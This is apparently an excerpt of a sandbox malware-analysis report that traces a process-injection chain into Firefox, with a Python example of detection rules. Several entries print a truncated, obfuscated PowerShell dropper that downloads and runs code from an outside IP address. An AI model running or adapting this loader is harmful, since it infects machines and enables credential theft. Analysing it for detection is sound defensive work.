Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe NtCreateKey: Direct from: 0x77382C6C Jump to behavior
Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe NtClose: Direct from: 0x77382B6C
Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe NtAllocateVirtualMemory: Direct from: 0x773848EC Jump to behavior
Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe NtQueryAttributesFile: Direct from: 0x77382E6C Jump to behavior
Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe NtSetInformationThread: Direct from: 0x77382B4C Jump to behavior
Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe NtTerminateThread: Direct from: 0x77382FCC Jump to behavior
Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe NtQueryInformationToken: Direct from: 0x77382CAC Jump to behavior
Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe NtOpenKeyEx: Direct from: 0x77382B9C Jump to behavior
Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe NtQueryValueKey: Direct from: 0x77382BEC Jump to behavior
Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe NtDeviceIoControlFile: Direct from: 0x77382AEC Jump to behavior
Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe NtCreateFile: Direct from: 0x77382FEC Jump to behavior
Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe NtOpenFile: Direct from: 0x77382DCC Jump to behavior
Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe NtProtectVirtualMemory: Direct from: 0x77377B2E Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: NULL target: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe protection: execute and read and write Jump to behavior
Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe Section loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and write Jump to behavior
Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe Section loaded: NULL target: C:\Windows\SysWOW64\recover.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe Section loaded: NULL target: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe Section loaded: NULL target: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe Thread register set: target process: 5996 Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe Thread APC queued: target process: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3000000 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: C0FFCC Jump to behavior
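The section maps, memory writes and APC recorded above, read together with the process creations recorded just below, describe a single injection chain: powershell.exe writes into wab.exe, wab.exe maps executable memory into qdSMStVpAfAXHdDEbm.exe, that process does the same into recover.exe, and recover.exe maps into firefox.exe after spawning it. The Python below is an added example, not part of this report or of any vendor's tooling: it parses evidence lines in the report's own line format into a process-creation graph and a cross-process-memory graph and applies four correlation rules. The rule names, the script-host and browser lists, and the assumption that explorer.exe is the only expected parent of wab.exe are mine; the evidence lines are constructed from this section's entries, with the long PowerShell command lines cut to "..." and the "Jump to behavior" link text dropped.

```python
import re
from collections import defaultdict

# Process paths exactly as recorded in this report.
WSCRIPT = r"C:\Windows\System32\wscript.exe"
PS64 = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
PS32 = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
CMD = r"C:\Windows\SysWOW64\cmd.exe"
WAB = r"C:\Program Files (x86)\Windows Mail\wab.exe"
LOADER = r"C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe"
RECOVER = r"C:\Windows\SysWOW64\recover.exe"
FIREFOX = r"C:\Program Files\Mozilla Firefox\firefox.exe"
ECHO_CMDLINE = r'"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Thermoswitch172.Med && echo $"'

# Constructed evidence lines in this report's own format (see the entries above
# and below this example); command lines are shortened to "...".
EVIDENCE = [
    f"Source: {WAB} Section loaded: NULL target: {LOADER} protection: execute and read and write",
    f"Source: {LOADER} Section loaded: NULL target: {WAB} protection: execute and read and write",
    f"Source: {LOADER} Section loaded: NULL target: {RECOVER} protection: execute and read and write",
    f"Source: {RECOVER} Section loaded: NULL target: {LOADER} protection: read write",
    f"Source: {RECOVER} Section loaded: NULL target: {FIREFOX} protection: read write",
    f"Source: {RECOVER} Section loaded: NULL target: {FIREFOX} protection: execute and read and write",
    f"Source: {RECOVER} Thread APC queued: target process: {LOADER}",
    f"Source: {PS32} Memory written: {WAB} base: 3000000",
    f'Source: {WSCRIPT} Process created: {PS64} "{PS64}" "$Caked124 = 1;..."',
    f'Source: {PS64} Process created: {PS32} "{PS32}" "$Caked124 = 1;..."',
    f"Source: {PS32} Process created: {CMD} {ECHO_CMDLINE}",
    f'Source: {PS32} Process created: {WAB} "{WAB}"',
    f'Source: {LOADER} Process created: {RECOVER} "{RECOVER}"',
    f'Source: {RECOVER} Process created: {FIREFOX} "{FIREFOX}"',
]

PROC_CREATED = re.compile(r'^Source: (.+?) Process created: (.+?) "')
SECTION_MAP = re.compile(r"^Source: (.+?) Section loaded: NULL target: (.+?) protection: (.+)$")
CROSS_PROC = re.compile(r"^Source: (.+?) (?:Memory written|Thread APC queued: target process): (.+?)(?: base: \S+)?$")

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}       # assumption: my list
BROWSERS = {"firefox.exe", "chrome.exe", "msedge.exe", "iexplore.exe"}  # assumption: my list
WAB_EXPECTED_PARENTS = {"explorer.exe"}  # assumption: wab.exe is normally launched by the user


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def parse(lines):
    """Build parent->children, target->writers and the set of processes that
    received an executable mapping from another process."""
    spawned = defaultdict(set)
    touched_by = defaultdict(set)
    executable_targets = set()
    for line in lines:
        if m := PROC_CREATED.match(line):
            spawned[m[1]].add(m[2])
        elif m := SECTION_MAP.match(line):
            touched_by[m[2]].add(m[1])
            if "execute" in m[3]:
                executable_targets.add(m[2])
        elif m := CROSS_PROC.match(line):
            touched_by[m[2]].add(m[1])
    return spawned, touched_by, executable_targets


def findings(lines):
    """Return sorted (rule, source, target) triples for the four rules."""
    spawned, touched_by, executable_targets = parse(lines)
    hits = []
    for parent, children in spawned.items():
        for child in children:
            p, c = basename(parent), basename(child)
            if p in SCRIPT_HOSTS and c == "powershell.exe":
                hits.append(("script_host_spawns_powershell", parent, child))
            if c == "wab.exe" and p not in WAB_EXPECTED_PARENTS:
                hits.append(("wab_unusual_parent", parent, child))
            if parent in executable_targets:
                # Another process placed executable memory in this one and it then
                # created a child: a hollowed host carrying the chain forward.
                hits.append(("injected_process_spawns_child", parent, child))
    for target, sources in touched_by.items():
        if basename(target) in BROWSERS:
            for src in sources:
                hits.append(("foreign_write_into_browser", src, target))
    return sorted(hits)


if __name__ == "__main__":
    for rule, src, dst in findings(EVIDENCE):
        print(f"{rule:32} {basename(src)} -> {basename(dst)}")
```

On the constructed lines the rules fire five times: wscript.exe starting powershell.exe, powershell.exe starting wab.exe, the loader and recover.exe each spawning a child after receiving executable memory from another process, and recover.exe writing into firefox.exe. The last rule is the one worth keeping in a production ruleset: a process that is neither the browser's own updater nor a debugger mapping executable pages into a browser is rarely benign, and in this report it precedes the browser credential access the signatures list.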
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Caked124 = 1;$Allegroernes15='S';$Allegroernes15+='ubstrin';$Allegroernes15+='g';Function unkaiserlike($Micrometeoroid){$Specialuddannelser=$Micrometeoroid.Length-$Caked124;For($Presaged=1; $Presaged -lt $Specialuddannelser; $Presaged+=(2)){$Vedic+=$Micrometeoroid.$Allegroernes15.Invoke($Presaged, $Caked124);}$Vedic;}function Hydrolyzable($Superheater){. ($Porsitets) ($Superheater);}$Alcoholmeter=unkaiserlike ',M oLzgiflDl,a,/ 5 . 0v F(,W,iKnUd o.wKsS FNSTB ,1.0,.T0,;S QWFiSna6c4 ;C Fx 6H4V; Sr.v :.1 2 1K.B0A), BGpe,cRk.oT/ 2h0 1,0 0N1 0A1D UF i r,eUfVo.x./H1 2,1S.A0, ';$Nonattribution175=unkaiserlike '.U sMe r -pA gDe.nDtb ';$Leggiest89=unkaiserlike 'Hh t t p :T/,/.8S7C.C1S2,1,. 1k0S5T.,1 6P3 / d,o m ksaPpkiBt,l e rb.fmIs iA ';$Heitiki=unkaiserlike 'T>S ';$Porsitets=unkaiserlike ' iUeLx ';$Mediaevalism='Garapato';Hydrolyzable (unkaiserlike 'RSCe,tS- CYoCnEt.e,n.t, C- P aAt.hS TP:J\ JUo.rbdMk l o,dAe,r . t.xNtC A-,V,aLl.u.eE .$,M e.dAiTa eBvSaJl.iHsNmU; ');Hydrolyzable (unkaiserlike ' i f ( t e sFt -Ap,a.t h, RTG:E\ J oNr d,k lBoFdFeDrO.,tPx.tL)F{ eGxSi t }.; ');$landingsprocedurernes = unkaiserlike ',e.cDh.o. N%,a p.p,d aotFa.% \ T hLeWrSmMoRsGwdiSt c.hM1B7 2I. MIe d, T&P&E Be.cUhFoF ,$. ';Hydrolyzable (unkaiserlike '.$.gQlCoPbpaClB:,ALl gRu mm=A( cHm dH / c $Ml,aanRdPiAn g s.p.r.oTc,eOdMuAr,eKr n,ets ) ');Hydrolyzable (unkaiserlike ' $ g lSo b a lU:LD.a t,aTmAaGsSk i n e rInNe,=N$ LSeAg,g i e,sDtf8O9E. s,pDlSi t (.$,H e iCtAi kSi,). ');$Leggiest89=$Datamaskinerne[0];Hydrolyzable (unkaiserlike ' $Gg l o b a,lK:.RJi p pHlAeSrMs.=CN e,w,-,ORb.j e cftB SDyAsmtPe mS.SN e tK.BWNe,bGC lSi eKnBtF ');Hydrolyzable (unkaiserlike 'U$IR iJp p l e rCsL.RH.e,aRd,e r sF[.$BNsoVnMabt t,rIi bAuDt iDo nF1S7d5 ]P=S$EAVl,c.o.hRo lHmSe,tHe r ');$Entertaineres=unkaiserlike 'SR iHpApWl e,rvs . 
DSoRwWn,l.oSa,dIFsiVl eS(a$ L e g,gCiBeSs tC8 9P,E$NL u,fKtOn iRn,gDeDr,s 1 8 5,)S ';$Entertaineres=$Algum[1]+$Entertaineres;$Luftningers185=$Algum[0];Hydrolyzable (unkaiserlike ',$ g,l.o,b,aGl :,P rLo,p a gAe r,e.nRd e =G(.TUeCs tN-,P a,t h $ LPuCfktDnSi,nGg eFr sF1T8I5L) ');while (!$Propagerende) {Hydrolyzable (unkaiserlike ' $Sgcl oDbSaFlS:.V iud.e lCyHsRtBe nQ=C$Ft,r uPei ') ;Hydrolyzable $Entertaineres;Hydrolyzable (unkaiserlike ' S.t a r tU-,Stl.eLe.pH S4 ');Hydrolyzable (unkaiserlike ',$ g lEo b.a lE:OP,rNoPp,aSgTe r.e n dEe,= (PT,e sRtF-.POa tPhV B$FL u,fTtbn i n,g eGrUsB1O8.5 )R ') ;Hydrolyzable (unkaiserlike ' $MgAl oVb aSlK: D.e.cNaTnSaUlJ=M$BgNl,oIbEaAl,:FA.lFgNoSr.iTsTtTiKcC+ +R% $ DYaSt aSmNa.sPk ivnNe rOnFe .,c,oTu.n tP ') ;$Leggiest89=$Datamaskinerne[$Decanal];}Hydrolyzable (unkaiserlike ' $Tg.lPo bsaClS:STBr aUn sFpSaSt rUoCn.iTzpe d, A=. ,GAeKt - C,oAn,t eDn tP T$TLAuNfTtFn iAn g eAr s 1J8S5 ');Hydrolyzable (unkaiserlike 'P$.gAlPoTb aOlB:FU n.laa i,df =S M[.S,yLsBt.eAm ..CUo n vRe.r.t.],: : F rBo m BGa sCe,6c4,SSt r.itnTgP(D Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Thermoswitch172.Med && echo $" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Caked124 = 1;$Allegroernes15='S';$Allegroernes15+='ubstrin';$Allegroernes15+='g';Function unkaiserlike($Micrometeoroid){$Specialuddannelser=$Micrometeoroid.Length-$Caked124;For($Presaged=1; $Presaged -lt $Specialuddannelser; $Presaged+=(2)){$Vedic+=$Micrometeoroid.$Allegroernes15.Invoke($Presaged, $Caked124);}$Vedic;}function Hydrolyzable($Superheater){. ($Porsitets) ($Superheater);}$Alcoholmeter=unkaiserlike ',M oLzgiflDl,a,/ 5 . 0v F(,W,iKnUd o.wKsS FNSTB ,1.0,.T0,;S QWFiSna6c4 ;C Fx 6H4V; Sr.v :.1 2 1K.B0A), BGpe,cRk.oT/ 2h0 1,0 0N1 0A1D UF i r,eUfVo.x./H1 2,1S.A0, ';$Nonattribution175=unkaiserlike '.U sMe r -pA gDe.nDtb ';$Leggiest89=unkaiserlike 'Hh t t p :T/,/.8S7C.C1S2,1,. 1k0S5T.,1 6P3 / d,o m ksaPpkiBt,l e rb.fmIs iA ';$Heitiki=unkaiserlike 'T>S ';$Porsitets=unkaiserlike ' iUeLx ';$Mediaevalism='Garapato';Hydrolyzable (unkaiserlike 'RSCe,tS- CYoCnEt.e,n.t, C- P aAt.hS TP:J\ JUo.rbdMk l o,dAe,r . t.xNtC A-,V,aLl.u.eE .$,M e.dAiTa eBvSaJl.iHsNmU; ');Hydrolyzable (unkaiserlike ' i f ( t e sFt -Ap,a.t h, RTG:E\ J oNr d,k lBoFdFeDrO.,tPx.tL)F{ eGxSi t }.; ');$landingsprocedurernes = unkaiserlike ',e.cDh.o. N%,a p.p,d aotFa.% \ T hLeWrSmMoRsGwdiSt c.hM1B7 2I. MIe d, T&P&E Be.cUhFoF ,$. ';Hydrolyzable (unkaiserlike '.$.gQlCoPbpaClB:,ALl gRu mm=A( cHm dH / c $Ml,aanRdPiAn g s.p.r.oTc,eOdMuAr,eKr n,ets ) ');Hydrolyzable (unkaiserlike ' $ g lSo b a lU:LD.a t,aTmAaGsSk i n e rInNe,=N$ LSeAg,g i e,sDtf8O9E. s,pDlSi t (.$,H e iCtAi kSi,). 
');$Leggiest89=$Datamaskinerne[0];Hydrolyzable (unkaiserlike ' $Gg l o b a,lK:.RJi p pHlAeSrMs.=CN e,w,-,ORb.j e cftB SDyAsmtPe mS.SN e tK.BWNe,bGC lSi eKnBtF ');Hydrolyzable (unkaiserlike 'U$IR iJp p l e rCsL.RH.e,aRd,e r sF[.$BNsoVnMabt t,rIi bAuDt iDo nF1S7d5 ]P=S$EAVl,c.o.hRo lHmSe,tHe r ');$Entertaineres=unkaiserlike 'SR iHpApWl e,rvs . DSoRwWn,l.oSa,dIFsiVl eS(a$ L e g,gCiBeSs tC8 9P,E$NL u,fKtOn iRn,gDeDr,s 1 8 5,)S ';$Entertaineres=$Algum[1]+$Entertaineres;$Luftningers185=$Algum[0];Hydrolyzable (unkaiserlike ',$ g,l.o,b,aGl :,P rLo,p a gAe r,e.nRd e =G(.TUeCs tN-,P a,t h $ LPuCfktDnSi,nGg eFr sF1T8I5L) ');while (!$Propagerende) {Hydrolyzable (unkaiserlike ' $Sgcl oDbSaFlS:.V iud.e lCyHsRtBe nQ=C$Ft,r uPei ') ;Hydrolyzable $Entertaineres;Hydrolyzable (unkaiserlike ' S.t a r tU-,Stl.eLe.pH S4 ');Hydrolyzable (unkaiserlike ',$ g lEo b.a lE:OP,rNoPp,aSgTe r.e n dEe,= (PT,e sRtF-.POa tPhV B$FL u,fTtbn i n,g eGrUsB1O8.5 )R ') ;Hydrolyzable (unkaiserlike ' $MgAl oVb aSlK: D.e.cNaTnSaUlJ=M$BgNl,oIbEaAl,:FA.lFgNoSr.iTsTtTiKcC+ +R% $ DYaSt aSmNa.sPk ivnNe rOnFe .,c,oTu.n tP ') ;$Leggiest89=$Datamaskinerne[$Decanal];}Hydrolyzable (unkaiserlike ' $Tg.lPo bsaClS:STBr aUn sFpSaSt rUoCn.iTzpe d, A=. ,GAeKt - C,oAn,t eDn tP T$TLAuNfTtFn iAn g eAr s 1J8S5 ');Hydrolyzable (unkaiserlike 'P$.gAlPoTb aOlB:FU n.laa i,df =S M[.S,yLsBt.eAm ..CUo n vRe.r.t.],: : F rBo m BGa sCe,6c4,SSt r.itnTgP(D Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Thermoswitch172.Med && echo $" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" Jump to behavior
Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe Process created: C:\Windows\SysWOW64\recover.exe "C:\Windows\SysWOW64\recover.exe" Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$caked124 = 1;$allegroernes15='s';$allegroernes15+='ubstrin';$allegroernes15+='g';function unkaiserlike($micrometeoroid){$specialuddannelser=$micrometeoroid.length-$caked124;for($presaged=1; $presaged -lt $specialuddannelser; $presaged+=(2)){$vedic+=$micrometeoroid.$allegroernes15.invoke($presaged, $caked124);}$vedic;}function hydrolyzable($superheater){. ($porsitets) ($superheater);}$alcoholmeter=unkaiserlike ',m olzgifldl,a,/ 5 . 0v f(,w,iknud o.wkss fnstb ,1.0,.t0,;s qwfisna6c4 ;c fx 6h4v; sr.v :.1 2 1k.b0a), bgpe,crk.ot/ 2h0 1,0 0n1 0a1d uf i r,eufvo.x./h1 2,1s.a0, ';$nonattribution175=unkaiserlike '.u sme r -pa gde.ndtb ';$leggiest89=unkaiserlike 'hh t t p :t/,/.8s7c.c1s2,1,. 1k0s5t.,1 6p3 / d,o m ksappkibt,l e rb.fmis ia ';$heitiki=unkaiserlike 't>s ';$porsitets=unkaiserlike ' iuelx ';$mediaevalism='garapato';hydrolyzable (unkaiserlike 'rsce,ts- cyocnet.e,n.t, c- p aat.hs tp:j\ juo.rbdmk l o,dae,r . t.xntc a-,v,all.u.ee .$,m e.daita ebvsajl.ihsnmu; ');hydrolyzable (unkaiserlike ' i f ( t e sft -ap,a.t h, rtg:e\ j onr d,k lbofdfedro.,tpx.tl)f{ egxsi t }.; ');$landingsprocedurernes = unkaiserlike ',e.cdh.o. n%,a p.p,d aotfa.% \ t hlewrsmmorsgwdist c.hm1b7 2i. mie d, t&p&e be.cuhfof ,$. ';hydrolyzable (unkaiserlike '.$.gqlcopbpaclb:,all gru mm=a( chm dh / c $ml,aanrdpian g s.p.r.otc,eodmuar,ekr n,ets ) ');hydrolyzable (unkaiserlike ' $ g lso b a lu:ld.a t,atmaagssk i n e rinne,=n$ lseag,g i e,sdtf8o9e. s,pdlsi t (.$,h e ictai ksi,). ');$leggiest89=$datamaskinerne[0];hydrolyzable (unkaiserlike ' $gg l o b a,lk:.rji p phlaesrms.=cn e,w,-,orb.j e cftb sdyasmtpe ms.sn e tk.bwne,bgc lsi eknbtf ');hydrolyzable (unkaiserlike 'u$ir ijp p l e rcsl.rh.e,ard,e r sf[.$bnsovnmabt t,rii baudt ido nf1s7d5 ]p=s$eavl,c.o.hro lhmse,the r ');$entertaineres=unkaiserlike 'sr ihpapwl e,rvs . 
dsorwwn,l.osa,difsivl es(a$ l e g,gcibess tc8 9p,e$nl u,fkton irn,gdedr,s 1 8 5,)s ';$entertaineres=$algum[1]+$entertaineres;$luftningers185=$algum[0];hydrolyzable (unkaiserlike ',$ g,l.o,b,agl :,p rlo,p a gae r,e.nrd e =g(.tuecs tn-,p a,t h $ lpucfktdnsi,ngg efr sf1t8i5l) ');while (!$propagerende) {hydrolyzable (unkaiserlike ' $sgcl odbsafls:.v iud.e lcyhsrtbe nq=c$ft,r upei ') ;hydrolyzable $entertaineres;hydrolyzable (unkaiserlike ' s.t a r tu-,stl.ele.ph s4 ');hydrolyzable (unkaiserlike ',$ g leo b.a le:op,rnopp,asgte r.e n dee,= (pt,e srtf-.poa tphv b$fl u,fttbn i n,g egrusb1o8.5 )r ') ;hydrolyzable (unkaiserlike ' $mgal ovb aslk: d.e.cnatnsaulj=m$bgnl,oibeaal,:fa.lfgnosr.itstttikcc+ +r% $ dyast asmna.spk ivnne ronfe .,c,otu.n tp ') ;$leggiest89=$datamaskinerne[$decanal];}hydrolyzable (unkaiserlike ' $tg.lpo bsacls:stbr aun sfpsast ruocn.itzpe d, a=. ,gaekt - c,oan,t edn tp t$tlaunfttfn ian g ear s 1j8s5 ');hydrolyzable (unkaiserlike 'p$.galpotb aolb:fu n.laa i,df =s m[.s,ylsbt.eam ..cuo n vre.r.t.],: : f rbo m bga sce,6c4,sst r.itntgp(d
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$caked124 = 1;$allegroernes15='s';$allegroernes15+='ubstrin';$allegroernes15+='g';function unkaiserlike($micrometeoroid){$specialuddannelser=$micrometeoroid.length-$caked124;for($presaged=1; $presaged -lt $specialuddannelser; $presaged+=(2)){$vedic+=$micrometeoroid.$allegroernes15.invoke($presaged, $caked124);}$vedic;}function hydrolyzable($superheater){. ($porsitets) ($superheater);}$alcoholmeter=unkaiserlike ',m olzgifldl,a,/ 5 . 0v f(,w,iknud o.wkss fnstb ,1.0,.t0,;s qwfisna6c4 ;c fx 6h4v; sr.v :.1 2 1k.b0a), bgpe,crk.ot/ 2h0 1,0 0n1 0a1d uf i r,eufvo.x./h1 2,1s.a0, ';$nonattribution175=unkaiserlike '.u sme r -pa gde.ndtb ';$leggiest89=unkaiserlike 'hh t t p :t/,/.8s7c.c1s2,1,. 1k0s5t.,1 6p3 / d,o m ksappkibt,l e rb.fmis ia ';$heitiki=unkaiserlike 't>s ';$porsitets=unkaiserlike ' iuelx ';$mediaevalism='garapato';hydrolyzable (unkaiserlike 'rsce,ts- cyocnet.e,n.t, c- p aat.hs tp:j\ juo.rbdmk l o,dae,r . t.xntc a-,v,all.u.ee .$,m e.daita ebvsajl.ihsnmu; ');hydrolyzable (unkaiserlike ' i f ( t e sft -ap,a.t h, rtg:e\ j onr d,k lbofdfedro.,tpx.tl)f{ egxsi t }.; ');$landingsprocedurernes = unkaiserlike ',e.cdh.o. n%,a p.p,d aotfa.% \ t hlewrsmmorsgwdist c.hm1b7 2i. mie d, t&p&e be.cuhfof ,$. ';hydrolyzable (unkaiserlike '.$.gqlcopbpaclb:,all gru mm=a( chm dh / c $ml,aanrdpian g s.p.r.otc,eodmuar,ekr n,ets ) ');hydrolyzable (unkaiserlike ' $ g lso b a lu:ld.a t,atmaagssk i n e rinne,=n$ lseag,g i e,sdtf8o9e. s,pdlsi t (.$,h e ictai ksi,). 
');$leggiest89=$datamaskinerne[0];hydrolyzable (unkaiserlike ' $gg l o b a,lk:.rji p phlaesrms.=cn e,w,-,orb.j e cftb sdyasmtpe ms.sn e tk.bwne,bgc lsi eknbtf ');hydrolyzable (unkaiserlike 'u$ir ijp p l e rcsl.rh.e,ard,e r sf[.$bnsovnmabt t,rii baudt ido nf1s7d5 ]p=s$eavl,c.o.hro lhmse,the r ');$entertaineres=unkaiserlike 'sr ihpapwl e,rvs . dsorwwn,l.osa,difsivl es(a$ l e g,gcibess tc8 9p,e$nl u,fkton irn,gdedr,s 1 8 5,)s ';$entertaineres=$algum[1]+$entertaineres;$luftningers185=$algum[0];hydrolyzable (unkaiserlike ',$ g,l.o,b,agl :,p rlo,p a gae r,e.nrd e =g(.tuecs tn-,p a,t h $ lpucfktdnsi,ngg efr sf1t8i5l) ');while (!$propagerende) {hydrolyzable (unkaiserlike ' $sgcl odbsafls:.v iud.e lcyhsrtbe nq=c$ft,r upei ') ;hydrolyzable $entertaineres;hydrolyzable (unkaiserlike ' s.t a r tu-,stl.ele.ph s4 ');hydrolyzable (unkaiserlike ',$ g leo b.a le:op,rnopp,asgte r.e n dee,= (pt,e srtf-.poa tphv b$fl u,fttbn i n,g egrusb1o8.5 )r ') ;hydrolyzable (unkaiserlike ' $mgal ovb aslk: d.e.cnatnsaulj=m$bgnl,oibeaal,:fa.lfgnosr.itstttikcc+ +r% $ dyast asmna.spk ivnne ronfe .,c,otu.n tp ') ;$leggiest89=$datamaskinerne[$decanal];}hydrolyzable (unkaiserlike ' $tg.lpo bsacls:stbr aun sfpsast ruocn.itzpe d, a=. ,gaekt - c,oan,t edn tp t$tlaunfttfn ian g ear s 1j8s5 ');hydrolyzable (unkaiserlike 'p$.galpotb aolb:fu n.laa i,df =s m[.s,ylsbt.eam ..cuo n vre.r.t.],: : f rbo m bga sce,6c4,sst r.itntgp(d
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$caked124 = 1;$allegroernes15='s';$allegroernes15+='ubstrin';$allegroernes15+='g';function unkaiserlike($micrometeoroid){$specialuddannelser=$micrometeoroid.length-$caked124;for($presaged=1; $presaged -lt $specialuddannelser; $presaged+=(2)){$vedic+=$micrometeoroid.$allegroernes15.invoke($presaged, $caked124);}$vedic;}function hydrolyzable($superheater){. ($porsitets) ($superheater);}$alcoholmeter=unkaiserlike ',m olzgifldl,a,/ 5 . 0v f(,w,iknud o.wkss fnstb ,1.0,.t0,;s qwfisna6c4 ;c fx 6h4v; sr.v :.1 2 1k.b0a), bgpe,crk.ot/ 2h0 1,0 0n1 0a1d uf i r,eufvo.x./h1 2,1s.a0, ';$nonattribution175=unkaiserlike '.u sme r -pa gde.ndtb ';$leggiest89=unkaiserlike 'hh t t p :t/,/.8s7c.c1s2,1,. 1k0s5t.,1 6p3 / d,o m ksappkibt,l e rb.fmis ia ';$heitiki=unkaiserlike 't>s ';$porsitets=unkaiserlike ' iuelx ';$mediaevalism='garapato';hydrolyzable (unkaiserlike 'rsce,ts- cyocnet.e,n.t, c- p aat.hs tp:j\ juo.rbdmk l o,dae,r . t.xntc a-,v,all.u.ee .$,m e.daita ebvsajl.ihsnmu; ');hydrolyzable (unkaiserlike ' i f ( t e sft -ap,a.t h, rtg:e\ j onr d,k 